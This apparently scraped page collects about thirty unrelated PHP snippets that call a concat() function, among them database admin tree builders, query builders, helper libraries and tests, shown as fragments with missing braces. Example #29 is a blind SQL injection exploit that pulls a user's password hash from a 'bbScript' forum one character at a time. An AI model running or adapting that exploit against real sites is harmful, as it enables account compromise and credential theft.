Example #1
 * Generate XML for the browser tree.
function doTree()
    global $misc, $data;
    $casts = $data->getCasts();
    $proto = concat(field('castsource'), ' AS ', field('casttarget'));
    $attrs = array('text' => $proto, 'icon' => 'Cast');
    $misc->printTree($casts, $attrs, 'casts');
Example #2
 public function getClass(GymEx $ex)
     $data = array();
     /* @var $gr GymGr */
     foreach ($ex->getGroups() as $gr) {
         $data[] = 'g' . $gr->getId();
     return concat($data);
Example #3
  * Регистрирует решение задачи
  * @return bool - признак, был ли ответ привязан к авторизованному пользователю
 public function registerSolution($taskIdent, $matchesStr)
     $task = $this->taskByIdent($taskIdent);
     $matchesStr = normalize_string($matchesStr, true);
     $mCnt = $task['m'];
     $sCnt = $task['s'];
     $cols = $task['c'];
     $rows = $task['r'];
     $excluded = $this->strToArray($matchesStr, $mCnt, $cols, $rows);
     //Вычисляем оставшиеся спички (пробегаем по всем точкам и берём правую и верхнюю спичку)
     $matches = array();
     for ($x = 0; $x <= $cols; $x++) {
         for ($y = 0; $y <= $rows; $y++) {
             $matchId = $this->matchId($x, $y, $x + 1, $y);
             if (!array_key_exists($matchId, $excluded) && $x + 1 <= $cols) {
                 $matches[$matchId] = true;
             $matchId = $this->matchId($x, $y, $x, $y + 1);
             if (!array_key_exists($matchId, $excluded) && $y + 1 <= $rows) {
                 $matches[$matchId] = true;
     $sqCnt = 0;
     //Скопируем массив
     $badMatches = $matches;
     //Вычисляем координаты всех квадратов
     for ($x = 0; $x < $cols; $x++) {
         for ($y = 0; $y < $rows; $y++) {
             //Проверяем точку
             $endX = $x;
             $endY = $y;
             while (++$endX <= $cols && ++$endY <= $rows) {
                 $bounds = $this->isFullSquare($x, $y, $endX, $endY, $matches);
                 if ($bounds) {
                     foreach ($bounds as $key => $val) {
     $badMatches = empty($badMatches) ? false : concat(array_keys($badMatches));
     check_condition(!$badMatches, "Bad matches left: [{$badMatches}]");
     check_condition($sqCnt == $sCnt, "Invalid squares cnt: [{$sqCnt}], required: [{$sCnt}].");
     //Сохраняем в базу
     $userId = AuthManager::getUserIdOrNull();
     //Склеим строку из отсартированных спичек
     $matchesStr = $this->arrToStr($excluded);
     //Регистрируем ответ пользователя
     $ansBindedToUser = MatchesBean::inst()->registerAnswer($taskIdent, $matchesStr, $userId);
     //Если зарегистрировали, попробуем дать очки
     if ($ansBindedToUser && $userId) {
     //Возвратим признак выданных очков
     return $ansBindedToUser;
Example #4
 public function build(&$params = null)
     $params = array();
     $query[] = 'delete from';
     $query[] = $this->table;
     $query[] = $this->fetchWhere($params);
     return concat($query);
Example #5
 public function build(&$params = null)
     $params = array();
     $query[] = 'insert into';
     $query[] = $this->table;
     $query[] = $this->fetchWhatInsCols();
     $query[] = 'values';
     $query[] = $this->fetchWhatInsVals($params);
     return concat($query);
 * Generate XML for the browser tree.
function doTree()
    global $misc, $data;
    $opclasses = $data->getOpClasses();
    // OpClass prototype: "op_class/access_method"
    $proto = concat(field('opcname'), '/', field('amname'));
    $attrs = array('text' => $proto, 'icon' => 'OperatorClass', 'toolTip' => field('opccomment'));
    $misc->printTree($opclasses, $attrs, 'opclasses');
Example #7
 public function build(&$params = null)
     $params = array();
     $query[] = 'update';
     $query[] = $this->table;
     $query[] = 'set';
     $query[] = $this->fetchWhat($params);
     $query[] = $this->fetchWhere($params);
     return concat($query);
Example #8
 public function build(&$params = null)
     $params = array();
     $query[] = 'select';
     $query[] = $this->what;
     $query[] = 'from';
     $query[] = $this->table;
     $query[] = $this->fetchWhere($params);
     $query[] = self::concatQueryTokens('group by', $this->group);
     $query[] = self::concatQueryTokens('order by', $this->order);
     $query[] = self::concatQueryTokens('limit', $this->limit);
     return concat($query);
function html_65c161fa3974dab7ff9b5b08fa07491e($Cache, $Pile, $doublons = array(), $Numrows = array(), $SP = 0)
    if (isset($Pile[0]["doublons"]) and is_array($Pile[0]["doublons"])) {
        $doublons = nettoyer_env_doublons($Pile[0]["doublons"]);
    $connect = '';
    $page = ($t1 = strval(invalideur_session($Cache, (function_exists("autoriser") || include_spip("inc/autoriser")) && autoriser('configurer', '_admin_vider') ? " " : "" ? ' ' : ''))) !== '' ? $t1 . ('

' . boite_ouvrir(interdire_scripts(wrap(concat(filtre_balise_img_dist(chemin_image('image-24.png'), '', 'cadre-icone'), _T('info_images_auto')), '<h3>')), 'simple', 'titrem') . '<div id="placehoder_taille_cache_images"><p>&nbsp;<br />&nbsp;<br />&nbsp;<br /></p></div>
	<script type="text/javascript">
		jQuery(function(){jQuery(\'#placehoder_taille_cache_images\').animateLoading().load(\'' . invalideur_session($Cache, replace(generer_action_auteur('calculer_taille_cache', 'images'), '&amp;', '&')) . '\');});
		<iframe src="' . invalideur_session($Cache, generer_action_auteur('calculer_taille_cache', 'images')) . '" style="width: 100%;height: 3em;overflow: hidden;"></iframe>

' . boite_pied() . '
	' . bouton_action(_T('public|spip|ecrire:bouton_vider_cache'), invalideur_session($Cache, generer_action_auteur('purger', 'vignettes', invalideur_session($Cache, self()))), 'ajax') . '
' . boite_fermer() . '
') : '';
    return analyse_resultat_skel('html_65c161fa3974dab7ff9b5b08fa07491e', $Cache, $page, '../prive/squelettes/inclure/admin_vider_images.html');
Example #10
  * Метод объединяет элементы массива в строку для запроса
 protected static function concatQueryTokens($prefix, $tokens, $glue = ', ', $takeTotallyEmpty = false)
     $paramsStr = trim(is_array($tokens) ? concat($tokens, $glue, $takeTotallyEmpty) : $tokens);
     return $paramsStr ? trim("{$prefix} {$paramsStr}") : '';
 public function testConcat()
     $this->assertEquals("ab", concat("a", "b"));
     $this->assertEquals("a-b", concat("a", "-", "b"));
Example #12

// prerequesites as determined by query (and perhaps device-sniffing), like polyfills and l10n data
$prereqs = '';
if (false) {
    $prereqs = '<script>' . file_get_contents('../../components/webcomponents-lite.min.js') . '</script>';
// critical segment: always necessary
$critical = concat(["src/index.css.html", "src/nav-bar.html", "src/some-content.html", "src/simple-router.html", "src/service-worker.html", "src/google-analytics.html"]);
// contextual segment: other modules identified from query
$contextual = concat([]);
// lazy segment: optional modules
$lazy = concat([]);
// collect dynamic payload
$payload = "{$prereqs} {$critical} {$contextual} {$lazy}";
// main index
$index = file_get_contents('index.main.html');
// replace client-side load instruction with constructed payload
$index = str_replace('<link rel="import" href="src/imports.html">', $payload, $index);
// serve
echo $index;
// concatenate module-content into a string
function concat($modules)
    $result = "";
    foreach ($modules as $module) {
        $result .= file_get_contents($module);
    return $result;
 * Generate XML for the browser tree.
function doTree()
    global $misc, $data;
    $aggregates = $data->getAggregates();
    $proto = concat(field('proname'), ' (', field('proargtypes'), ')');
    $reqvars = $misc->getRequestVars('aggregate');
    $attrs = array('text' => $proto, 'icon' => 'Aggregate', 'toolTip' => field('aggcomment'), 'action' => url('redirect.php', $reqvars, array('action' => 'properties', 'aggrname' => field('proname'), 'aggrtype' => field('proargtypes'))));
    $misc->printTree($aggregates, $attrs, 'aggregates');
Example #14
 * Plucks a property from a collection of associative arrays.
 * eg:
 * 	Fn\pluck([
 * 			['name' => 'moe', 'age' => 45],
 * 			['name' => 'larry', 'age' => 55],
 * 			['name' => 'curly', 'age' => 65]
 * 		], 'name')
 * // ['moe', 'larry', 'curly']
 * @param array[] $collection
 * @param string $propName
 * @return mixed
function pluck(array $collection, $propName)
    return array_reduce($collection, function ($vals, $item) use($propName) {
        return isset($item[$propName]) ? concat($vals, $item[$propName]) : $vals;
    }, []);
Example #15
function next_level_dir($dirs1, $dirs2 = null, $dirs3 = null, $dirs4 = null)
    return normalize_path(concat(func_get_args(), DIR_SEPARATOR), DIR_SEPARATOR);
Example #16

// prerequesites as determined by query (and perhaps device-sniffing), like polyfills and l10n data
$prereqs = '';
if (false) {
    $prereqs = '<script>' . file_get_contents('../../components/webcomponents-lite.min.js') . '</script>';
// critical segment: always required for first paint
$critical = concat(["../../components/nano/annotations.html", "src/simple-router.html", "l10n.html", "main-css.html"]);
// contextual segment: other modules identified from query
$contextual = concat([]);
// lazy segment: optional modules that we choose to include in the primary payload
$lazy = concat(["src/primer-data.html", "src/nav-bar.html", "src/some-content.html", "src/service-worker.html", "src/google-analytics.html"]);
// collect dynamic payload
$payload = "{$prereqs} {$critical} {$contextual} {$lazy}";
// main index
$index = file_get_contents('main.html');
// replace client-side load instruction with constructed payload
$index = str_replace('<link rel="import" href="src/imports.html">', $payload, $index);
// serve
echo $index;
// concatenate module-content into a string
function concat($modules)
    $result = "";
    foreach ($modules as $module) {
        $result .= file_get_contents($module);
    return $result;
Example #17
 * database/table administration and tuning tasks
 * $Id: admin.php
function doAdmin($type, $msg = '')
    global $script, $data, $misc, $lang;
    $misc->printTabs($type, 'admin');
    if ($type == 'database') {
        printf("<p>{$lang['stradminondatabase']}</p>\n", $misc->printVal($_REQUEST['object']));
    } else {
        printf("<p>{$lang['stradminontable']}</p>\n", $misc->printVal($_REQUEST['object']));
    echo "<table style=\"width: 50%\">\n";
    echo "<tr>\n";
    echo "<th class=\"data\">";
    $misc->printHelp($lang['strvacuum'], 'pg.admin.vacuum') . "</th>\n";
    echo "</th>";
    echo "<th class=\"data\">";
    $misc->printHelp($lang['stranalyze'], 'pg.admin.analyze');
    echo "</th>";
    if ($data->hasRecluster()) {
        echo "<th class=\"data\">";
        $misc->printHelp($lang['strclusterindex'], 'pg.index.cluster');
        echo "</th>";
    echo "<th class=\"data\">";
    $misc->printHelp($lang['strreindex'], 'pg.index.reindex');
    echo "</th>";
    echo "</tr>";
    // Vacuum
    echo "<tr class=\"row1\">\n";
    echo "<td style=\"text-align: center; vertical-align: bottom\">\n";
    echo "<form action=\"{$script}\" method=\"post\">\n";
    echo "<p><input type=\"hidden\" name=\"action\" value=\"confirm_vacuum\" />\n";
    echo $misc->form;
    if ($type == 'table') {
        echo "<input type=\"hidden\" name=\"table\" value=\"", htmlspecialchars($_REQUEST['object']), "\" />\n";
        echo "<input type=\"hidden\" name=\"subject\" value=\"table\" />\n";
    echo "<input type=\"submit\" value=\"{$lang['strvacuum']}\" /></p>\n";
    echo "</form>\n";
    echo "</td>\n";
    // Analyze
    echo "<td style=\"text-align: center; vertical-align: bottom\">\n";
    echo "<form action=\"{$script}\" method=\"post\">\n";
    echo "<p><input type=\"hidden\" name=\"action\" value=\"confirm_analyze\" />\n";
    echo $misc->form;
    if ($type == 'table') {
        echo "<input type=\"hidden\" name=\"table\" value=\"", htmlspecialchars($_REQUEST['object']), "\" />\n";
        echo "<input type=\"hidden\" name=\"subject\" value=\"table\" />\n";
    echo "<input type=\"submit\" value=\"{$lang['stranalyze']}\" /></p>\n";
    echo "</form>\n";
    echo "</td>\n";
    // Cluster
    if ($data->hasRecluster()) {
        $disabled = '';
        echo "<td style=\"text-align: center; vertical-align: bottom\">\n";
        echo "<form action=\"{$script}\" method=\"post\">\n";
        echo $misc->form;
        if ($type == 'table') {
            echo "<input type=\"hidden\" name=\"table\" value=\"", htmlspecialchars($_REQUEST['object']), "\" />\n";
            echo "<input type=\"hidden\" name=\"subject\" value=\"table\" />\n";
            if (!$data->alreadyClustered($_REQUEST['object'])) {
                $disabled = 'disabled="disabled" ';
                echo "{$lang['strnoclusteravailable']}<br />";
        echo "<p><input type=\"hidden\" name=\"action\" value=\"confirm_cluster\" />\n";
        echo "<input type=\"submit\" value=\"{$lang['strclusterindex']}\" {$disabled}/></p>\n";
        echo "</form>\n";
        echo "</td>\n";
    // Reindex
    echo "<td style=\"text-align: center; vertical-align: bottom\">\n";
    echo "<form action=\"{$script}\" method=\"post\">\n";
    echo "<p><input type=\"hidden\" name=\"action\" value=\"confirm_reindex\" />\n";
    echo $misc->form;
    if ($type == 'table') {
        echo "<input type=\"hidden\" name=\"table\" value=\"", htmlspecialchars($_REQUEST['object']), "\" />\n";
        echo "<input type=\"hidden\" name=\"subject\" value=\"table\" />\n";
    echo "<input type=\"submit\" value=\"{$lang['strreindex']}\" /></p>\n";
    echo "</form>\n";
    echo "</td>\n";
    echo "</tr>\n";
    echo "</table>\n";
    // Autovacuum
    if ($data->hasAutovacuum()) {
        // get defaults values for autovacuum
        $defaults = $data->getAutovacuum();
        // Fetch the autovacuum properties from the database or table if != ''
        if ($type == 'table') {
            $autovac = $data->getTableAutovacuum($_REQUEST['table']);
        } else {
            $autovac = $data->getTableAutovacuum();
        echo "<br /><br /><h2>{$lang['strvacuumpertable']}</h2>";
        echo '<p>' . ($defaults['autovacuum'] == 'on' ? $lang['strturnedon'] : $lang['strturnedoff']) . '</p>';
        echo "<p class=\"message\">{$lang['strnotdefaultinred']}</p>";
        function enlight($f, $p)
            if (isset($f[$p[0]]) and $f[$p[0]] != $p[1]) {
                return "<span style=\"color:#F33;font-weight:bold\">" . htmlspecialchars($f[$p[0]]) . "</span>";
            return htmlspecialchars($p[1]);
        $columns = array('namespace' => array('title' => $lang['strschema'], 'field' => field('nspname'), 'url' => "redirect.php?subject=schema&amp;{$misc->href}&amp;", 'vars' => array('schema' => 'nspname')), 'relname' => array('title' => $lang['strtable'], 'field' => field('relname'), 'url' => "redirect.php?subject=table&amp;{$misc->href}&amp;", 'vars' => array('table' => 'relname', 'schema' => 'nspname')), 'autovacuum_enabled' => array('title' => $lang['strenabled'], 'field' => callback('enlight', array('autovacuum_enabled', $defaults['autovacuum'])), 'type' => 'verbatim'), 'autovacuum_vacuum_threshold' => array('title' => $lang['strvacuumbasethreshold'], 'field' => callback('enlight', array('autovacuum_vacuum_threshold', $defaults['autovacuum_vacuum_threshold'])), 'type' => 'verbatim'), 'autovacuum_vacuum_scale_factor' => array('title' => $lang['strvacuumscalefactor'], 'field' => callback('enlight', array('autovacuum_vacuum_scale_factor', $defaults['autovacuum_vacuum_scale_factor'])), 'type' => 'verbatim'), 'autovacuum_analyze_threshold' => array('title' => $lang['stranalybasethreshold'], 'field' => callback('enlight', array('autovacuum_analyze_threshold', $defaults['autovacuum_analyze_threshold'])), 'type' => 'verbatim'), 'autovacuum_analyze_scale_factor' => array('title' => $lang['stranalyzescalefactor'], 'field' => callback('enlight', array('autovacuum_analyze_scale_factor', $defaults['autovacuum_analyze_scale_factor'])), 'type' => 'verbatim'), 'autovacuum_vacuum_cost_delay' => array('title' => $lang['strvacuumcostdelay'], 'field' => concat(callback('enlight', array('autovacuum_vacuum_cost_delay', $defaults['autovacuum_vacuum_cost_delay'])), 'ms'), 'type' => 'verbatim'), 'autovacuum_vacuum_cost_limit' => array('title' => $lang['strvacuumcostlimit'], 'field' => callback('enlight', array('autovacuum_vacuum_cost_limit', $defaults['autovacuum_vacuum_cost_limit'])), 'type' => 'verbatim'));
        // Maybe we need to check permissions here?
        $columns['actions'] = array('title' => $lang['stractions']);
        $actions = array('edit' => array('title' => $lang['stredit'], 'url' => "{$script}?action=confeditautovac&amp;{$misc->href}&amp;subject={$type}&amp;", 'vars' => array('schema' => 'nspname', 'table' => 'relname')), 'delete' => array('title' => $lang['strdelete'], 'url' => "{$script}?action=confdelautovac&amp;{$misc->href}&amp;subject={$type}&amp;", 'vars' => array('schema' => 'nspname', 'table' => 'relname')));
        if ($type == 'table') {
            unset($actions['edit']['vars']['schema'], $actions['delete']['vars']['schema'], $columns['namespace'], $columns['relname']);
        $misc->printTable($autovac, $columns, $actions, $lang['strnovacuumconf']);
        if ($type == 'table' and $autovac->recordCount() == 0) {
            echo "<br />";
            echo "<a href=\"tables.php?action=confeditautovac&amp;{$misc->href}&amp;table=", htmlspecialchars($_REQUEST['table']), "\">{$lang['straddvacuumtable']}</a>";
Example #18
 public function clean($group = null)
     $this->LOGGER->info($group ? "Очистка кеша по группе [{$group}]" : 'Полная очистка кеша');
     if ($group) {
         //Эту группу больше не нужно валидировать
         //Очистим ключи локального хранилища
         $keys = $this->CACHE->keys();
         $removed = array();
         $prefix = $this->localCacheGroup($group);
         foreach ($keys as $key) {
             if (starts_with($key, $prefix)) {
                 $removed[] = $key;
         if ($removed) {
             $this->LOGGER->info('В локальном кеше были удалены следующие ключи: {}.', concat($removed));
     } else {
         $this->TREE->setAllValidated('Полная очистка кеша');
Example #19
 * Returns a sequence of the first item in each collection then the second, etc.
function interleave()
    $arrs = func_get_args();
    $firsts = map('v\\first', $arrs);
    $rests = map('v\\rest', $arrs);
    if (every(function ($a) {
        return !empty($a);
    }, $rests)) {
        return concat($firsts, apply('v\\interleave', $rests));
    return $firsts;
Example #20
    expects([nonEmpty, arrayAccess, string], $sequence);
    return $sequence[0];
try {
} catch (\InvalidArgumentException $e) {
    echo $e->getMessage() . "\n";
// 3. Specify several parameters of the same type
function concat($str1, $str2)
    expectsAll(string, [$str1, $str2]);
    return $str1 . $str2;
try {
    concat(1, 2);
} catch (\InvalidArgumentException $e) {
    echo $e->getMessage() . "\n";
// 4. Specify type for optional parameter
function splitBy($string, $separator = ' ', $limit = null)
    expectsAll(string, [$string, $separator]);
    expectsOptional(int, $string);
    return explode($separator, $string, $limit);
try {
    splitBy('hello world', ' ', 'world');
} catch (\InvalidArgumentException $e) {
    echo $e->getMessage() . "\n";
Example #21

// prerequesites as determined by query (and perhaps device-sniffing), like polyfills and l10n data
$prereqs = '';
if (false) {
    $prereqs = '<script>' . file_get_contents('../../components/webcomponents-lite.min.js') . '</script>';
// critical segment: always required for first paint
$critical = concat(["../../components/polymer/polymer-nano.html", "../../components/icons-simple.html", "../../components/nano-elements/nano-layout.html", "src/polymart-view.html"]);
// contextual segment: other modules identified from query
$contextual = concat(["src/mart-data.html", "src/nav-bar.html", "../../components/nano-elements/nano-carousel.html", "src/product-view.html", "src/home-view.html", "src/cart-data.html", "src/cart-view.html", "src/cart-item-view.html", "src/grid-layout.html", "src/categories-view.html"]);
// optional segment: modules that we choose to include in the primary payload
$optional = concat(["../../components/nano-elements/nano-ajax.html", "../../components/nano-elements/nano-serviceworker.html"]);
// lazy segment: modules that we choose to load async (but early)
$lazy = "\n\n";
$lazy .= implode("\n", ['<link async rel="import" href="src/search-view.html">', '<link async rel="import" href="src/simple-router.html">', '<link async rel="import" href="src/category-view.html">']);
// contextual data
$data = "\n\n";
$payload = @file_get_contents('mart/cache/payload.json');
if ($payload) {
    $data .= "<script>window.payload={$payload};</script>\n";
$trends = @file_get_contents('mart/cache/trends');
if ($trends) {
  $data .= "<script>window.trends=$trends;</script>";
$vod = @file_get_contents('mart/cache/vod');
if ($vod) {
  $data .= "\n<script>window.vod=$vod;</script>";
Example #22
 * Same as `insert` but inserts an array instead of a single item.
 * ```php
 * insertAll(2, ['x', 'y'], [1, 2, 3, 4]); // [1, 2, 'x', 'y', 3, 4]
 * insertAll(-1,  ['x', 'y'], [1, 2, 3, 4]); // [1, 2, 3, 'x', 'y', 4]
 * insertAll(11, ['x', 'y'], [1, 2, 3, 4]); // [1, 2, 3, 4, 'x', 'y']
 * insertAll(0, ['x', 'y'], [1, 2, 3, 4]); // ['x', 'y', 1, 2, 3, 4]
 * insertAll(-11, ['x', 'y'], [1, 2, 3, 4]); // ['x', 'y', 1, 2, 3, 4]
 * insertAll(2, 'llo', 'He World'); // 'Hello World'
 * ```
 * @signature Number -> [a] -> [a] -> [a]
 * @signature Number -> String -> String -> String
 * @param  int $position
 * @param  mixed $items
 * @param  array $list
 * @return array
function insertAll()
    $insertAll = function ($position, $items, $list) {
        $length = length($list);
        if ($position < 0) {
            $position = $length + $position;
        if ($position < 0) {
            $position = 0;
        return $position >= $length ? concat($list, $items) : concatAll([take($position, $list), $items, remove($position, $list)]);
    return apply(curry($insertAll), func_get_args());
Example #23
 public function spawnDirectory($subpath, $create = true)
     // Try to resolve the path
     $subpath = tryresolvepath(concat($this->getPath(), SEP, ltrim($subpath, SEP)));
     if (file_exists($subpath)) {
         if (is_dir($subpath)) {
             return new Directory($subpath, $create);
         return UNDEFINED;
     return new Directory($subpath, $create);
Example #24
  * Метод подключает ресурсы к сущности фолдинга.
  * Всегда подключаем все ресурсы, ненужные будут выкинуты в процессе финализации страницы.
 public function getResourcesLinks($ident, $content = null)
     $this->LOGGER->info("Getting resource links for entity [{$ident}].");
     $tokens = array();
     foreach ($this->RESOURCE_TYPES_LINKED as $type) {
         $di = $this->getResourceDi($ident, $type);
         switch ($type) {
             case self::RTYPE_JS:
                 $tokens[] = PsHtml::linkJs($di);
             case self::RTYPE_CSS:
                 $tokens[] = PsHtml::linkCss($di);
             case self::RTYPE_PCSS:
                 $tokens[] = PsHtml::linkCss($di, 'print');
     //Приаттачим спрайты
     $sprite = $this->getSprite($ident);
     $tokens[] = $sprite ? PsHtml::linkCss($sprite->getCssDi()) : '';
     //Контент - после ресурсов
     $tokens[] = $content;
     return concat($tokens);
Example #25
$isChrome = strpos(@$_SERVER[HTTP_USER_AGENT], 'Chrome') !== false && strpos(@$_SERVER[HTTP_USER_AGENT], 'Edge') === false;
// prerequesites as determined by query (and perhaps device-sniffing), like polyfills and l10n data
$prereqs = '';
if (!$isChrome) {
    $prereqs = '<script>' . file_get_contents('../../components/webcomponents-lite.min.js') . '</script>';
$critical = '';
$contextual = '';
$optional = '';
$lazy = '';
$data = '';
$comp = "../../components";
// critical segment: always required for first paint
$critical = concat(["{$comp}/nano/nano.html", "{$comp}/icons-simple.html", "{$comp}/nano-elements/nano-layout.html", "src/polymart-view.html"]);
// contextual segment: other modules identified from query
$contextual = concat([
// optional segment: modules that we choose to include in the primary payload
$optional = concat([
Example #26

namespace Arrgh;

describe('concat()', function () {
    it('flattens a multi-dimensional array into a single array', function () {
        expect(concat([[1, 2, 3], [4, 5, 6]]))->toWrap([1, 2, 3, 4, 5, 6]);
 * Generate XML for the browser tree.
function doTree()
    global $misc, $data;
    $funcs = $data->getFunctions();
    $proto = concat(field('proname'), ' (', field('proarguments'), ')');
    $reqvars = $misc->getRequestVars('function');
    $attrs = array('text' => $proto, 'icon' => 'Function', 'toolTip' => field('procomment'), 'action' => url('redirect.php', $reqvars, array('action' => 'properties', 'function' => $proto, 'function_oid' => field('prooid'))));
    $misc->printTree($funcs, $attrs, 'functions');
Example #28
function Aspis_str_replace_single($search, $replace, $subject)
    $subj = $subject[0];
    $ndl = $search[0];
    $ndl_len = strlen($ndl);
    $indexes = array();
    $offset = 0;
    while (strlen($subj) > 0 && ($i = strpos($subj, $ndl)) !== FALSE) {
        $indexes[] = $i + $offset;
        $subj = substr($subj, $i + $ndl_len);
        $offset += $i + $ndl_len;
    $i = 0;
    if (count($indexes) > 0) {
        $res = array("", false);
        foreach ($indexes as $j) {
            $res = concat($res, array(substr($subject[0], $i, $j - $i), AspisTaintAt($subject[1], $i, $j - $i)));
            if ($replace !== "") {
                $res = concat($res, $replace);
            $i = $j + $ndl_len;
        $res = concat($res, array(substr($subject[0], $i), AspisTaintAt($subject[1], $i)));
    } else {
        $res = $subject;
    return $res;
Example #29
    $length = strlen($string);
    $output = '';
    for ($i = 0; $i < $length; $i++) {
        $output .= sprintf("CHAR(%d),", ord($string[$i]));
    return 'CONCAT(' . substr($output, 0, -1) . ')';
echo "\n[~] bbScript <= (id) Blind SQL Injection Exploit";
echo "\n[~] Bug found && exploited by cOndemned\n";
if ($argc != 3) {
    printf("[!] Usage: php %s <target> <login>\n\n", $argv[0]);
list(, $target, $login) = $argv;
echo "[~] Target username set to {$login}\n";
$login = concat($login);
$chars = array_merge((array) $chars, range(48, 57), range(97, 102));
$pos = 1;
echo "[~] Password Hash : ";
while ($pos != 33) {
    for ($i = 0; $i <= 16; $i++) {
        $query = "/index.php?action=showtopic&id=1+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username={$login}),{$pos},1)=CHAR({$chars[$i]})--";
        if (!preg_match('#Error#', file_get_contents($target . $query), $resp)) {
            printf("%s", chr($chars[$i]));
echo "\n[~] Done\n\n";
Example #30
 * Generate XML for the browser tree.
function doTree()
    global $misc, $data;
    $operators = $data->getOperators();
    // Operator prototype: "type operator type"
    $proto = concat(field('oprleftname'), ' ', field('oprname'), ' ', field('oprrightname'));
    $reqvars = $misc->getRequestVars('operator');
    $attrs = array('text' => $proto, 'icon' => 'Operator', 'toolTip' => field('oprcomment'), 'action' => url('operators.php', $reqvars, array('action' => 'properties', 'operator' => $proto, 'operator_oid' => field('oid'))));
    $misc->printTree($operators, $attrs, 'operators');